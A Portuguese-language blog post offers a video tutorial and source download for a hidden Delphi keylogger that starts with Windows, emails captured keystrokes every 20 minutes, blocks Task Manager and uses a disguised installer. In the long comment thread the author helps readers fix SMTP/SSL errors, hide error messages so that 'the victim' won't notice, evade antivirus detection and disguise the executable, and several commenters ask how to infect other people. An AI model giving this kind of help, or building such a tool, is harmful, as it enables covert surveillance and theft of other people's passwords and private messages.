Social Icons

^^

quinta-feira, 1 de julho de 2010

Criando keylogger avançado no Delphi 7

Esse é um tutorial dos bons que ensina a criar um keylogger avançado no delphi 7, aprenda agora mesmo a capturar as teclas digitadas no seu PC, saiba tudo que acontece enquanto você não está, e o melhor de tudo ele será feito por você mesmo(a), veja algumas funções:

capturar todas as teclas digitadas --
iniciar junto com o windows--
enviar logs para um email a cada 20 minutos--
trabalhar em modo oculto--
dados de acesso ao email criptografados--
arquivo exe compactado e indescompactavel--
Auto instalador camuflado para o keylogger--

Capacidade de diferencias letras maiúsculas de minúsculas-- 



Veja o vídeo ou baixe



______________________________________________ 

Download do source
Download do tutorial escrito
______________________________________________ 


Download das ferramentas usadas:


Borland delphi 7
Criptografador ProgMaster
Arquivos SSL
______________________________________________ 


Clique aqui para aprender a criar um auto instalador para seu keylogger



116 comentários:

  1. se bota no lugar do gmail, hotmail da certo ?

    ResponderExcluir
  2. Creio que não, pq dizem por ai que o servidor smtp do hotmail é pago, então usa o Gmail msm.

    ResponderExcluir
  3. vídeo aula

    caiu o link bota outro link ai mano

    ResponderExcluir
  4. Estou providênciando o concerto dos links...

    em breve estará ok.

    ResponderExcluir
  5. O video é bom pra caramba!!!!!!adorei
    super maneiro e de alto padrão
    vlw

    ResponderExcluir
  6. esse video é uns dos melhores q já vi tá de parabens

    ResponderExcluir
  7. Obrigado, estarei sempre atualizando o keylogger para deixa-lo sempre indetectavel...

    ResponderExcluir
  8. ESSE CARA AI É BOM MESMO DEPOIS EU QUERIA UMAS AULAS PARTICULARES
    GOSTEI MUITO

    ResponderExcluir
  9. KARACA QUE VIDEO MANEIRO VER NÃO TERIA MAIS POR AE ???

    ResponderExcluir
  10. So pra saber de um coisa
    pra que que serve esse email no codigo da unit


    "IdMessage1.BccList.EMailAddresses := 'jeffersonfariassampaio@gmail.com';//edtbcc.Text;"

    ResponderExcluir
  11. Bom meu amigo anônimo, obviamente esse é meu email.... você logicamente deve tira-lo e colocar o endereço do seu email criptografado.

    Por exemplo se vc criptografou seu email e jogou numa dit chamado user vai ficar assim:

    IdMessage.bccList.EmailAddress := editUser.text;


    Eu deixei assim exatamente para que vcs entendam, mas pelo visto ñ deu muito certo.

    ResponderExcluir
  12. ocorreu um erro aqui
    voce poderia me ajudar
    o erro foi este:

    IdMessage1.MessageParts.Clear;

    ResponderExcluir
  13. Cara
    eu baixei o seu source e alterei os dados do e-mail etc, mas só que não tem cheito de executar o gerenciador tarefas depois que executa o programinha, aí a pessoa pode desconfiar né!!!

    ResponderExcluir
  14. cara eu colocquei o keylogger no meu pc
    aí tipo toda vez que eu ligo o pc aparece a pasta destino de onde eu executei o arquivo.

    ResponderExcluir
  15. Caro Rodrigo toda vez que você executa o keylogger ele cria uma chave no registro do windows(Regedit) contendo a local onde está seu executavel, para poder inicia-lo junto com o windows, por isso se você executar o keylogger em um lugar a move-lo, assim toda vez que o windows for iniciar vai abrir aquela pasta....
    Sobre o Gerenciador de tarefas é que implementei uns códigos para impedir que ele rode, mas você pode tirar "KillTask" tem uma função e um Timer cotendo os códigos para finalizar processos, fica a seu critério modificar e melhora-lo.

    ResponderExcluir
  16. mais aonde que fica
    me informe aonde eu devo excluir!

    ResponderExcluir
  17. Jefferson
    não tem como transferir o serve de keylogger para uma outra pasta depois que executar, tipo, recortar mesmo sabe, porque se executar várias vezes o serve o pc fica lento.

    ResponderExcluir
  18. Olá Rodrigo, para excluir a chave que faz com que o kl se auto execute vá em: iniciar >> executar >> digite regedit e tecle enter >>
    procure o caminho: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>
    apague a chave que no valor contiver o caminho de seu executavel...

    ResponderExcluir
  19. Jefferson
    eu gostei do keylogger
    mais tipo eu quero que ele deixe executar tudo no windows normalmente, tipo, não dá pra mexer no regedit e nem no gerenciador de tarefas, eu tentei deletar os "KillTesk" mais não deu certo, eu acho que fiz alguma coisa errada, me informe o lugar que eu devo excluir nos mínimos detalhes!

    ResponderExcluir
  20. me adicione no msn e te passo umas dicas legais.

    jeffersonfariassampaio@hotmail.com

    ResponderExcluir
  21. Esse KL pode mandar para outras pessoas?

    ResponderExcluir
  22. Aqui no mega Upload n da pra baxa fl ,fl q o download foi exedido ond eu passo baixar?!

    ResponderExcluir
  23. AI MONOW COMO VOU SABER SE A HORA QUE BOTO OS DADOS LA NO PROGMASTER SE VC NAO VAI TER CONTATO COM MEU USUARIO E SENHA?

    ResponderExcluir
  24. Bom meu amigo, você pode desativar sua internet se quiser, pra mim de nada vale seus dados...
    eu só quero ajudar e nada mais, você pode utilizar um descompilador ou o reshacker para analizar o programa, e verá que não tem nenhum mecanismo de acesso a internet, você pode até mesmo utilizar um sniffer para analizar o que entra e o que sai de seu PC.

    Espero que fique claro para todos, não quero os dados de vocês!

    ResponderExcluir
  25. quando eu recebo o relatorio as letras estao todas confusas nunca mostra exatamente as letras certas oq eu faço?
    por exemplo eu digito namaquina
    testandokeylgger = no log aparece mais ou menos assim "56gfmbf [ENTER] ggtes"
    me ajuda ae
    TIAGO

    ResponderExcluir
  26. OLha Tiago provavelmente você está executando mais de um keylogger em seu pc..., já fiz varios testes aqui e quando tem mais de um keylogger no pc a captura não funciona com perfeição, por isso certifique-se de que apenas o "nosso"/seu keylogger está sendo executado, se ñ resolver me avisa.

    ResponderExcluir
  27. eu nao consegui vefificar se há mais de um keylogger, por favor pode me explicar como verifico se ha mais de um keylogger rodando, mais é bem provavel q eu rodei ele duas vezes pode acontecer de rodar o mesmo kl duas vezes?
    por que a cada 20 minutos ao inves deu receber um email eu recebo dois igualzinhos ou as vezes umas letras diferentes. me ajuda ai como faço pra cancelar um ou desativar algo do tipo.
    desde ja agradeço TIAGO

    ResponderExcluir
  28. Tiago, procure por processos com "msnmsgr.exe" no gerenciador de tarefas e finalize todos... depois execute apenas o keylogger que você quer.

    ResponderExcluir
  29. eu ja consegui funciona-lo agora me responde uma coisa meu gerenciador de tarefas nao funciona mais depois que eu executei o programa, como faço para volta-lo funcionar tem jeito?
    ou so formatando?
    desde ja agradeço

    ResponderExcluir
  30. Como eu sempre digo, não só copie e sim aprenda!
    Se você não observar código não vai entender o funcionamento...

    Dê uma olhada no código e você vai achar a resposta para sua pergunta, t + obrigao por vistar.

    ResponderExcluir
  31. é jefferson, para a galera ai tem que explicar, assim que eu terminar o chat eu posto um "desinstalador" pro KL só pra tirar esse grilo da galera.
    abraaço
    Marcísio Souza.

    ResponderExcluir
  32. Jefferson fiz tudo certo mas o email n tava chegando ai eu dexei o form visivel pra ve o q era mas quando dava o tempo de envia um email me dava um erro assim: 5.1.7 Bad sender adress sintax.

    ResponderExcluir
  33. Aqui ta dando erro no SSL na hora de manda o email com os logs.

    José Henrique

    ResponderExcluir
  34. Henrique verifique se sua aplicação possue os arquivos de recurso ssleay32 e libeay32, caso não tenha você pode encontrar os mesmo em um link logo acima.

    ResponderExcluir
  35. Anonimo o erro de sintax é porque o seu email está errado..., provavelmente o email de recebimento. Aconselho que reveja a parte de criptografia.

    ResponderExcluir
  36. Mto bom, mto bom mesmo o melhor q eu ja achei. Este tutorial funciona direito, tudo conforme o descrito, so queria tirar uma duvida. Este keylogger deixa um log das informaçoes no computador? Se deixa em que pasta é salva, ou como configurar esta funçao? Obrigado! Parabens pela aula muito simples e bem explicada.

    ResponderExcluir
  37. Não esse keylogger envia direto para o email, mas para você salvar no pc é só adicionar a linha de código "memo1.Lines.SaveToFile('caminho que vc deseja salvar');"

    ResponderExcluir
  38. jefferson cara ta bem visitado seu blog gostei vc e cara mesmo maluco

    ResponderExcluir
  39. ae cara vc pode me encinar como usa o criptografador progmaster eu pesquisei na net e não achei nada falando sobre isso

    por favor lek fala ae jae!!!

    se der add no Msn tbm : marcus_liamo@hotmail.com

    ResponderExcluir
  40. ae vc pode encinar como usar o criptografador progmaster pro que eu pesquisei na net e naum achei nada
    por favor ajuda ae lek

    Msn pra contato: marcus_liamo@hotmail.com

    ResponderExcluir
  41. MarKoz MSN:markozhacker@hotmail.com19 de maio de 2011 09:27

    Ótimo post, fiz aqui em casa e funcionou blz, retirei o killtask e blz, mas se estou na net ta tudo bem, e quando estou off, aparece o erro #11001, sei que esse erro e por não estar conectado, tem como ignorar esse erro ou esconder para que a pessoa quando não conectada nao veja o erro no windows e acabe desconfiando?

    ResponderExcluir
  42. Try
    bloco de comando normais
    except
    bloco de comando a ser executados se der erro

    procure sobre isso...

    ResponderExcluir
  43. Amigo, só uma dúvida. Como faço para retirar as opções de bloqueio por parte do keylloger, com ?o gerenciador de tarefas e o msconfig ?

    ResponderExcluir
  44. Primeiro vc é muito bom mesmo cara parabéns ótimo 10; Manda uma dica ai como rodar o kl só partir do ascesso a internet e etc...

    ResponderExcluir
  45. O avast pega como ( trojan spy).
    tem como deixa-lo indetectável !

    ResponderExcluir
  46. Sim tem como deixa-lo indetectável, mas você terá que trocar alguns códigos que estão sendo usados...

    Você deve tirar algumas Units desnecessárias e passar a usar um pouco mais a api do windows.

    T +.

    ResponderExcluir
  47. ola estou com o mesmo problema do MarKoz teria como vc esplicar mais detalhadamente como retirar o erro ssl socket #11001

    ResponderExcluir
  48. Queria saber se esse keylogger salva as conversas do msn e manda para um email e se tem como mandar para outro pc como se fosse um vírus?
    Att

    ResponderExcluir
  49. O erro ssl socket #11001 quer dizer que não tem internet, para tratar erros(exeções) é preciso usar o "Try, Except, Finally";

    Try
    // Trechos de Código referente ao envio
    // Se não ocorrer erro não executa o Except
    Except
    // Trecho de código caso ocorra erro.

    Procure mais sobre tratamento de exeções.

    ResponderExcluir
  50. Ola amigo fiz tudo que estava no video e no bloco de notas troquei ate o seu email pelo o meu mais não sei se o programa ta fucionando e tbm não chega relatorios para mim no email o que fazeer?

    ResponderExcluir
  51. socket error #11001 host not found
    Qual é o Problema?

    ResponderExcluir
  52. socket error #11001 host not found = Host não encontrado, ou seja o host que você está utilizando está incorreto, se você estiver usando gmail o host certo é: smtp.gmail.com e assim depende do servidor que você for usar.

    ResponderExcluir
  53. "Ola amigo fiz tudo que estava no video e no bloco de notas troquei ate o seu email pelo o meu mais não sei se o programa ta fucionando e tbm não chega relatorios para mim no email o que fazeer?"

    Olha amigo se não está apresentando nenhum erro é porque o kl está funcionando perfeitamente...

    verifique mais uma vez os dados de sua conta de email e recebimento.

    veja se o firewall não bloqueou.

    ResponderExcluir
  54. Amigo, primeiramente quero lhe dar os parabéns pelo post. Gostaria de saber como eu faço para deixar o form visivel, ou seja, quais códigos preciso mexer para deixá-lo visivel. Agraceço a ajuda.

    ResponderExcluir
  55. Procure por Application.ShowMainForm := False;
    altere por Application.ShowMainForm := True; ou apenas retire a linha Application.ShowMainForm := False;

    T +

    ResponderExcluir
  56. Olá, Jeff.
    Parabéns pelo post e pelo programa.
    Tu tem uma pacienciencia de jÒ...
    Alem de postar o prog ainda ajuda nas dúvidas.
    Tu vai pro céu.
    Rsrsrs
    Valeus mesmo.

    ResponderExcluir
  57. Olá querido.
    Me diga uma coisa, está dando o seguinte erro no meu.


    Build
    [Warning] Unit1.pas(209): For loop control variable must be simple local variable
    [Warning] Unit1.pas(202): Variable 'd' might not have been initialized
    [Warning] Unit1.pas(202): Variable 'e' might not have been initialized

    o que pode ser?
    Valeus pela ajuda.

    ResponderExcluir
  58. Na verdade Warnings não são erros são só "avisos"...

    Mas relaxe pode proseguir com os Warnings mesmo, ou então coloque {$WARNINGS OFF}

    ResponderExcluir
  59. estou baixando os programas i vou postar o que deu, i sober o msnmsgr.exe que esta dando como virus, isso e normal valeu, retornarei

    ResponderExcluir
  60. Este KL já está detectavel... Agora é só fazer alterações adequadas para que ele volte a ficar invisivel perante os AVs.

    ResponderExcluir
  61. como deixo indetectavel? e o msnmsgr influencia em que no programa, pois execultei eli aqui so desativei em modo de segurança, pois o gerenciador de tarefas ficou desativadoi o msnconfig, valeu,

    ResponderExcluir
  62. Fera, baixei o source e coloquei os meus dados criptografados nos campos indicados...
    só que n deu certo... quando eu rodo o keylogger 20 minutos depois de ter iniciado ele mostra a seguinte mensagem "syntax error" ou " connection closed gracefully"....
    o q esta acontecendo?

    ResponderExcluir
  63. no IdSSLIOHandlerSocket mude para a versão sslvSSLv23.

    ResponderExcluir
  64. Jefferson..eu fiz tudo certinho como o video e nem fiz nada com o kl ainda..queria saber se tem como infectar amigo meu..e se tiver como eu faço isso?tenho q mandar a pasta q ta com o arquivo do delphi feito e as dll ou oq?n sei como faço pra infectar..

    ResponderExcluir
  65. como eu faço esse keylogger funcionar?fiz tudo igualzinho o video..e agora?eu passei no virustotal e deu 0% de chance de ter virus..entao n funcionou?=/ eu escaniei a pasta q esta o arquivo do delphi com as dll q falou pra baixar..faço oq me ajuda '-'

    ResponderExcluir
  66. o keylogger so vai funcionar se as dll tiverem na pasta junto com o executavel ou se eu juntar o executavel com uma foto a pessoa vai se infectar?;s

    ResponderExcluir
  67. Olá camarada...
    Fiz tudo certinho e até agora não recebi nenhum email com os logs... o que pode estar errado?

    ResponderExcluir
  68. Ai man, concerta os lnks, achei interessante a video aula, mais esta off os links, megaupload fora do ar.. abraços, Orion.

    ResponderExcluir
  69. Olá!!! Gostei do video, está muito bem explicado!!! ;D
    Com o fechamento do Megaupload o link dos sources está quebrado, você poderia postar outros links válidos??? Sem o código nao tem como fazer o keylogger lol!!!

    ResponderExcluir
  70. primeiramente muito obrigado por esta postagem. Gostaria de pedir que reposte os links ps o megaupload ja era, a galera ta postando muito na sua video aula do youtube isso vlw.

    ResponderExcluir
  71. LINK QUEBRADO A ANOOSSSSSSSS MUDA ISSO AI MAN

    ResponderExcluir
  72. Amigo, tem como você mudar os links de download??

    ResponderExcluir
  73. Olá amigo,
    os links estão quebrados, poderia arrumar?
    vlw

    ResponderExcluir
  74. Boa noite
    eu coloque a porta no kl ficou assim IdSMTP1.Port := 465;
    pq tavam dado erro.
    e o tratar erros exeções)Try, Except, Finally como eu faço eu acho que é no Procedure TForm1.Enviar mas onde

    ResponderExcluir
  75. Falta os links ta tudo quebrado

    ResponderExcluir
  76. Mano o mega fechou, corrige o link da aula escrita pra mim conseguir os codigos.

    vlw

    ResponderExcluir
  77. Porfavor Poe os Links em Outro server Mega Upload Ja era

    Esse TUTO é muito Bom Por favor

    ResponderExcluir
  78. [Erro] Unit1.pas(502); Undeclared identifer: 'SSLOption'
    [Erro] Unit1.pas(502); Missing operator or semicolon
    [Erro] Unit1.pas(503); Undeclared identifer: 'SSLOption'
    [Erro] Unit1.pas(503); Missing operator or semicolon

    Como arruma isso?

    ResponderExcluir
  79. Deu um erro aqui no socket "erro 10054". Alguem sabe arruma isso.. Depois que passou os 20 min ele deu esse erro e o email não chegou.

    ResponderExcluir
  80. Jefferson me ajuda!
    quero criar um gerador de log para um jogo.
    quero tambem qe esse log tire umprint e envie tudo isso para um email.

    tipo: eu jogo point blank e meu clã sempre faz torneio de cash só para os membros do clã mesmo.

    e mesmo pedindo para cada jogador tirar print ainda acho que alguns usam hack para se aproveitar.

    só quero dois campos um insira seu nick do jogo e outro enviar.

    temumporem também, o programa de log ou espião não sei o nome não pode ser intalavel ou ficar sempre no computador do jogador, eu não quero de forma nenhuma invadir aprivacidade das pessoas, só quero que gere um log e tire um print quando estiver jogando nos eventos.

    olha tenho um exemplo olha ai mais ou menos como funciona http://www.wgbonline.com/portal/index.php?option=com_content&view=category&id=60&Itemid=80

    agradeceria muito a sua ajuda qualquer coisa entra em contato pelo email. galeraadapulia@gmail.com vlw.

    ResponderExcluir
  81. eai cara, entao eu fiz tudo certo, ta funcionando enviando pro email e td, porem nao esta 100% axo q o memo é bugado, pois no codigo diz pra enviar,
    IdMessage1.Body.Text := memo1.Lines.Text; certo mais no email so chega Memo1...e um monte de coisa q eu nao quero;x

    ResponderExcluir
  82. Jeff, e se eu quiser enviar os dados coletados para o servidor do meu site, por exemplo, ao invés dum email, é muito complicado? como é que faço? abração!

    ResponderExcluir
  83. Para enviar para o servidor de seu site eu recomendo usar FTP, mas também pode usar o protocolo http...

    da uma olhada nos componentes indy, e vê lá o idftp.

    ResponderExcluir
  84. Parabéns pelas dicas... excelentes... ;)
    Mas para mim deu erro de Access Violation ao iniciar a procedure Enviar, acertei todos os objetos para a versão do Delphi 2010 e compilou sem erros e segui as orientações do video.
    Alguem sabe o que pode ser?

    ResponderExcluir
  85. dica para quem teve o gerenciador de tarefas blokeado
    va no prompt de comando e digite isso
    taskkill -im msnmsgr.exe /f /t
    em msnmsgr.exe pode ser qualquer outro aplicativo ^^mais no caso msnmsgr e o nosso keylooger
    espero ter ajudado
    flwss

    ResponderExcluir
  86. Jefersson..
    Acrescentei nesse Keylogger o printscreen quando o botão esquerdo do mause é clicado. Mas num sei como enviar esse printscreen para o email. Pode ajudar?

    OBS.: Estou salvando os printscreens na pasta do Keylogger.

    ResponderExcluir
  87. Mas eu queria enviar as printscreen capturados no mesmo email, para não fica com uns 300 email cada um com uma printscreen.

    ResponderExcluir
  88. Os prints tem que ser enviados como anexo no email, me add ai: jeffersonfariassampaio@hotmail.com

    ResponderExcluir
  89. pode postar o codigo que tira o print e envia como anexo junto no mesmo email?

    ResponderExcluir
  90. Jefferson adc ai meu msn :

    mateusko1234@hotmail.com

    ResponderExcluir
  91. Cara adc ai meu mateusko1234@hotmail.com

    ResponderExcluir
  92. falar verdade nem uso keylogger =/,mas nesse tuto aprendi a ocultar um processo, a n deixar um exe ser executado, e várias outras coisa q tava precisando =), vlw cara

    ResponderExcluir
  93. Cara, boa noite!
    Seguinte, eu to começando agora em delphi, se eu fizer esse KL e colocar ele como .exe, eu posso tipo "camuflar" ele em uma foto? E se a pessoa aceitar o arquivo ela recebe como jpg ou .exe?

    ResponderExcluir
  94. Cara, se eu criar isso, da pra camuflar ele em uma imagem e mante-lo como .jpg?

    ResponderExcluir
  95. A extensão do arquivo tem que ser sempre .exe, mas vc pode tentar camuflar apenas trocando o ícone.

    ResponderExcluir
  96. Olá eu sou FOXxER e vi que o seu keylogger e muito bom! mas eu tenho q admitir q falta coisas como: ao ser executado tem q ser excluido e aparecer msg de erro , um melhor codigo pois pegar letras de 1 em 1 segundo nao da fica muito ruin (coisa q eu ja encontrei e adicionei ao meu ^^) e suporte a e-mail pois coloca-lo desde a sorce code fica ruin caso vc queira divulga-lo porai



    mais o pro dele e q ele e apenas detectado por 2 antivirus nem muito usasdos porai ele foi escaneado no novirustankhs e vi que nem avira pega ele ^^
    mas com todos os erros ainda e um otimo keylogger que se melhorado ficara melhor ke KL's
    profisionais '-'

    ResponderExcluir
  97. Pois é foxx já faz bastante tempo que fiz esse kl, mas tem um melhor aqui http://blogprogramadores.blogspot.com.br/p/super-keylogger.html

    ResponderExcluir
  98. Meu caro Jefferson, ótimo trabalho parabéns msm!!

    a respeito do código que captura as teclas na parte :

    35 : begin//foi pressionado o end o programa vai finalizar.
    memo1.text := Memo1.text + ' [End] ';
    Application.Terminate
    end;

    gostaria de saber se isso fará com que o server lá no pc da vitima seja finalizado de uma vez, se por um acaso ela tocar nessa tecla (ja que vc pôs o Application.Terminate), a tecla END quando pressionada automaticamente se posiciona ao final da palavra digitada, eu cheguei ate a retirar esse Application.Terminate, mas quando fui testar msm com o Memo desabilitado o cursor não se posicionou ao fim da palavra. Por gentileza meu caro, vc poderia sanar essa minha dúvida? pois sou iniciante em Delphi e Object Pascal ainda.

    Abraços

    ResponderExcluir
  99. Os application.Terminate foram colocados em possiveis locais de erros, caso ocorra algum erro o programa fecha automaticamente do contrário continua funcionando e pega a tecla normalmente.

    ResponderExcluir
  100. Caro Jefferson,

    como ja deu pra vc perceber eu estou fazendo um kl bem semelhante a esse seu, inclusive peguei uns trechos de código do seu e implementei no meu (exeto o SSL e coisas ligadas a criptografia, pois estou enviando normal mesmo pela porta 587).

    Entretanto, estou com sérios problemas quanto ao envio pro email. O problema é que quando a net é muito lenta, o kl não envia a dá erro de Socket me apresentando uma mensagem. E isso é ruim, pois se a net da vítima oscilar, creio que também irá aparecer a mensagem pra ela, daí ela pode desconfiar né? mesmo que o kl esteje invisível.

    Será que não existe alguma forma de ocultar essa mensagem? E queria saber também o horário que você está On no MSN?

    Abração colega!!

    ResponderExcluir
  101. Amigo meu nome é Gil, muito bom esse tuto ai, fiz tudo aqui conforme mandou acho que está funcionando mas não ta enviando email, ja tentei com bol com gmail etc... oq pode ser?

    ResponderExcluir
  102. Como eu faço para descompilar um programa feito em Delphi?

    ResponderExcluir
  103. Alan Marcone, você pode usar o dede ou o ResouceRacker mas dificilmente você conseguirá ver o código fonte pois o delphi não é muito facil de descompilar e o maximo que vai conseguir é um monte de chamadas de memoria, a menos que vc entenda assemble perfeitamente de nada adianta descompilar.

    ResponderExcluir
  104. aki ta dando erro socket 10060
    conection timed out. como corrigir esse erro?

    ResponderExcluir
  105. um problema o programa não funciona com win7 qual seria a linha de Código a se usar para poder resolver esse problema

    ResponderExcluir
  106. Esse tutorial já está um pouco antigo, quando eu fiz nem se falava em win7... vc tem que ver onde está ocorrendo o erro, e compilar o programa em uma IDE mais nova q a versão 7 do Delphi.

    ResponderExcluir
  107. Jefferson precisa falar com você, será que você pode passar algum email ou endereço pra contato?

    ResponderExcluir
    Respostas
    1. meu email pessoal é jeffersonfariassampaio@hotmail.com

      pode entrar em contato tbm pelo email: progmasterofficial@hotmail.com

      Excluir
  108. Como colocar o keylogger para mostrar o processo onde foi digitado,tem como???

    ResponderExcluir
  109. O tutorial será atualizado em 20/08/13

    ResponderExcluir

Popular Posts

 

Seguidores

Hora exata:

Total de visualizações de página